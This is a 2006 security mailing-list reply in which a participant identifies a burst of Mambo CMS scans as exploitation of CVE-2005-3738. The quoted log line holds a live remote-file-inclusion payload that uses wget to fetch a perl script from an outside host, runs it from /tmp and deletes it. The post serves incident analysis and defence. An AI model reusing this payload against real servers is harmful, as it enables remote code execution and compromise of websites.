Security Incidents mailing list archives

Re: High volume of Mambo scans

From: "George A. Theall" <theall () tifaware com>
Date: Sun, 14 May 2006 20:24:58 -0400

On Sat, May 13, 2006 at 10:36:41AM -0300, Daniel Cid wrote:

Since Thursday night I'm seeing a high volume of scans

...

200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"


This looks like what's covered by CVE-2005-3738 and described here:

  http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html


George
-- 
theall () tifaware com

Attachment: _bin
Description:

Current thread:

High volume of Mambo scans Daniel Cid (May 14)
- Re: High volume of Mambo scans Peter Kosinar (May 14)
- Re: High volume of Mambo scans George A. Theall (May 14)
- Re: High volume of Mambo scans Jamie Riden (May 14)
- Re: High volume of Mambo scans Karl Schlitt (May 15)